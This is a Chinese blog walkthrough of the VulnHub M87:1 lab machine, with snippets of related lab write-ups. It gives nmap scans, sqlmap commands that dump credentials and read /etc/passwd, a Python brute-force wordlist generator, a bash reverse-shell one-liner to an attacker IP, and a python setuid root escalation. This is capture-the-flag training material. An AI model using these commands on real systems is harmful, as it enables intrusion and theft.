vulnhub——M87:1

最新推荐文章于 2024-09-09 09:05:25 发布
最新推荐文章于 2024-09-09 09:05:25 发布
阅读量191 收藏
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61619198/article/details/131676669
版权

M87:1的安装地址:

https://www.vulnhub.com/entry/m87-1,595/

解压后打开:

一.nmap信息收集

sudo nmap -sn 192.168.0.0/24

sudo nmap -sT --min-rate 10000 -p- 192.168.0.173

sudo nmap -sT -sV -sC -O -p22,80,9090 192.168.0.173

sudo nmap -sU --top-ports 20 192.168.0.173

sudo nmap --script=vuln -p22,80,9090 192.168.0.173

二.对收集到的攻击面进行具体的分析

http://192.168.0.173

https://192.168.0.173

是两个登录页面,进行目录扫描,发现了另外的几个登录页面
http://192.168.0.173/admin
http://192.168.0.173/admin/backup

在http://192.168.0.173/admin/ url中尝试参数id=1' 发生了报错,猜测存在sql注入,用sqlmap跑一下

sqlmap -u "http://192.168.0.173/admin/?id=1" --batch
从结果来看存在sql注入漏洞

sqlmap -u "http://192.168.0.173/admin/?id=1" --current-db --batch

sqlmap -u "http://192.168.0.173/admin/?id=1" --tables -D "db"    --batch

sqlmap -u "http://192.168.0.173/admin/?id=1" --columns -T "users" -D "db"    --batch

sqlmap -u "http://192.168.0.173/admin/?id=1" --dump -C "username,password" -T "users" -D "db"    --batch

得到的账号密码并不能登录任何一个界面,但是能通过sqlmap进行文件读取
sqlmap -u "http://192.168.0.173/admin/?id=1"  -D "db" --file-read /etc/passwd  --batch
找到了一个charlotte用户

我们收集到了这么多账号密码,现在又收集到了一个,试着用暴力破解。
抓一个https://192.168.0.173:9090的包
发现有一个Authorization:字段,对里面的字符串解密得到的就是在页面输入的: 账号:密码

对收集到的账号密码进行排列组合,以账号:密码的格式并且base64编码以后输出,可以用python简单写一个脚本
import itertools
import base64

# 给出账号和密码列表
accounts = ['admin', 'adrian', 'alex', 'brad', 'ceo', 'expenses', 'jack', 'john', 'julia', 'mike', 'root', 'charlotte']
passwords = ['gae5g5a', '5t96y4i95y', 'fw54vrfwe45', '4kworw4', '15The4Dm1n4L1f3', 'dsfsrw4']

# 生成所有的排列组合,并对每个结果进行 Base64 编码
for account, password in itertools.product(accounts, passwords):
    result = account + ':' + password
    encoded_result = base64.b64encode(result.encode('utf-8')).decode('utf-8')
    print(encoded_result)

最终得到了一组可以登录的账号密码: charlotte:15The4Dm1n4L1f3,能登录9090端口的页面。
登录进来发现有个终端

建立bash反弹然后开始提权
bash -c "/bin/bash -i >& /dev/tcp/192.168.0.154/9001 0>&1"

建立一个python终端
python -c 'import pty;pty.spawn("/bin/bash")'

查看old发现是python2.7可以利用os模块调用本地的root的shell

获得FLAG

考察点:

1.nmap的使用和对参数的理解

2.目录扫描工具的使用

3.sql注入的理解和sqlmap的使用

4.对信息进行处理的能力,就比如把字符串加密排列组合等

5.burp suit密码爆破的使用

6.Linux提权

思路整理:

首先使用nmap进行信息收集,等到了80,9090两个web站点,访问后发现是两个登录页面,进行目录扫描,扫出来另外两个登录界面,都没有什么特别明显的信息。通过对/admin这个页面的url观察发现输入id=1'时会报错,所以使用sqlmap跑一下,结果真的存在sql注入,然后就是查库,查表,查字段值等,把得到的账号密码都有尝试登录一下,发现都不能成功登录。尝试sqlmap的文件读取功能,读取了/etc/passwd这个文件发现了又一个账号,然后对9090端口进行抓包分析,存在一个

Authorization字段,账号密码的格式为:账号:密码,而且是base64加密过后的。自己写了一个排列组合并且加密的脚本得到了字典,然后爆破出账号密码的组合,成功登录。在登录后的页面发现了一个终端,建立bash反弹,最终利用python完成了提权。

收获的知识点:

1.sqlmap的文件读写功能 :--file-read /etc/passwd

2.python的提权:查看old发现是python2.7可以利用os模块调用本地的root的shell

python -c 'import os;os.setuid(0);os.system("/bin/bash")'

KIW1
关注
Vulnhub靶机m87:1渗透
xingjinhao123的博客
03-06 820
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/m87-1,595/ 靶机难度容易,拥有两个用户,网络适配器是NAT模式自动分配IP地址 运行环境 靶机:网络设为NAT,IP地址:192.168.174.138 攻击机:同网段下的kali linux,IP地址:192.168.174.135 开始渗透 运行靶机 靶机运行之后就提示了IP地址,端口和一个域名 扫一下端口看是否有其他存在 扫一下80端口的目录 开始访问得到的这些目录 80端口的首页 admin
vulnhub——Red:1靶机
Re1_zf的博客
10-31 1059
然后就不需要手动执行了,这里会生成一个新的rev文件,这个rev文件会驱动supersecretfileuc.c的执行,即它会自动执行,在攻击机上监听对应端口就可以了。这里回到前面搜索ippsec有权限的目录时搜索到的一个用户目录,查看一下另一个没有提到的用户目录,拿到另一个flag。可以将这个文件的内容进行一下替换,替换为反弹shell的脚本,这样就可以弹回root权限的shell了应该。前面探查到了这个网站是wordpress的架构,利用文件包含查看一下它的配置文件,看有没有什么有用的信息。
vulnhub靶场——CORROSION:1
Czheisenberg的博客
02-16 2062
准备 攻击机:kali 靶机: CORROSION: 1 NAT 192.168.91.0 网段 下载连接: https://www.vulnhub.com/entry/corrosion-1,730/ 信息搜集与利用 主机发现 python3 ping.py -H 192.168.91.0/24 如图所示得到目标靶机IP地址: 192.168.91.188 端口扫描 如图所示只开放了 22,80 两个端口。 HTTP http://192.168.91.188/ 目录扫描 挨个访问上面的路径:
vulnhub靶场——THE PLANETS:EARTH
Czheisenberg的博客
02-12 1605
THE PLANETS:EARTH 准备 攻击机: kali 靶机: THE PLANETS:EARTH NAT 192.168.91.0 网段 下载连接 [https://www.vulnhub.com/entry/the-planets-earth,755/] 信息搜集与利用 主机发现 https://github.com/czheisenberg/MyCode/blob/master/Scan/scapy/ping.py 如图所示利用python脚本扫描除了 IP 地址。 端口扫描 nmap -O
Vulnhub——DOUBLETROUBLE: 1
weixin_46038704的博客
06-03 596
Vulnhub——DOUBLETROUBLE: 1
vulnhub——DC:8
XYZCG的博客
04-27 429
查看46996.sh,提示应将脚本上传至目标机器并告知了两种提权方法,此次使用第二种。,点击下方Save后,提交一次Contact后成功显示phpinfo页面。在主页随意点击时发现url有注入点——),使用用户名john登录成功。继续写入php代码反弹shell。爆破数据库中加密的pass。攻击机开启临时web服务。目标机获取漏洞利用脚本。运行,获取root权限。
Vulnhub——DC:9
XYZCG的博客
05-05 619
敲门端口服务,通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,,使系统开启需要访问的服务端口,才能对外访问,不使用时,再使用自定义序列号来“关门”,将端口关闭,不对外监听,该服务进一步提升了服务和系统的安全性。访问80,四个页面:Home、Display All Records、Search、Manage,后两个可能存在sql注入,输入任意值后点击submit,bp抓到包后保存为文件,sqlmap一把嗦。中有无登录的用户名,无则跳出,有则读取。
看完这篇 教你玩转渗透测试靶机Vulnhub——HarryPotter:Nagini
Aluxian_的博客
08-01 649
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是HarryPotter(哈利波特)系列一共有三个靶机,这是第二个Nagini老样子需要获得root权限找到flag(这里是魂器)即可。这个靶机难度高,就是有点费时间麻烦 其他都还好1.信息收集获取ip地址 和端口信息web等2.SSRF漏洞的利用Gopherus工具的使用MD5sum生成md5加密值3.joomscan。
vulnhub——DC:7
XYZCG的博客
04-26 798
访问https://www.drupal.org/project/php/releases/8.x-1.1下载tar.gz类型的包,在Extend模块下进行安装并启用,回到Content模块新建页面写入。往脚本内写入反弹shell,监听相关端口等待一段挺长的时间后定时任务触发,拿到权限(我这里用了同样的端口所以得先退出当前www-data的shell)这段文本是一个电子邮件通知,具体是由系统上的cron守护程序(定时任务)发送的。如果目录不存在,你会收到一个错误消息,就像你在电子邮件通知中看到的那样。
Stapler:1 靶机渗透测试-Vulnhub(STAPLER: 1)
m0_68117643的博客
08-01 1848
该靶机(stapler:1)直接导入Vmware无法使用,可先使用VirtualBox打开后再导出虚拟机,使用Vmware打开即可。 思路:12380端口扫描—wpscan爆破用户名——文件包含漏洞利用——修改管理员账户密码——上传webshell——sudo提权......
渗透靶场——Vulnhub:Acid
tlovejr的博客
09-17 312
1、首先还是常规套路,kali攻击机器还有靶机均为net模式,然后扫描主机 2、找到存活靶机ip地址,然后我们继续开始信息收集 nmap -T4 -p- 192.168.40.130 3、访问8080端口没有结果,那么我们继续访问一下33447这个端口试一下 4、成功发现我们要继续做的这个界面,继续信息收集,目录扫描,但是并没有发现有用的信息 5、然后我们继续尝试一下robots.txt 6、发现也没有什么有用的信息,那么我们查看一下源码,看看有没有什么有用的信息 7、在查看源码的时候发现有一个有
VulnHub靶机渗透】三:Billu_b0x
野原新之助
04-06 1077
该靶机设定了一些常见的Web应用漏洞,如文件包含、任意文件下载、注入等。 (VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成。)
VulnHub靶机渗透】八:DC-5
野原新之助
05-07 705
该靶机Web处存在文件包含漏洞,本地提权存在screen已知版本漏洞。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
VulnHub靶机渗透】二:Lazysysadmin
野原新之助
03-30 1244
该靶机设定了一些不安全的配置以及弱口令,导致重要文件泄漏。本次通过对发现的端口服务,逐一进行渗透提权测试来学习该靶机。
【网络安全】漏洞挖掘之CVE-2019-9670+检测工具
最新发布
等风来
09-09 248
CVE-2019-9670 是一个与相关的严重漏洞。ZCS 中的 AutoDiscover 服务存在不正确的 XML 解析处理,该漏洞可被利用来注入恶意 XML 代码(例如外部实体注入(XXE)攻击),从而导致服务器任意文件读取或远程代码执行 (RCE)。Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行。
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 399
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1486
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 994
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值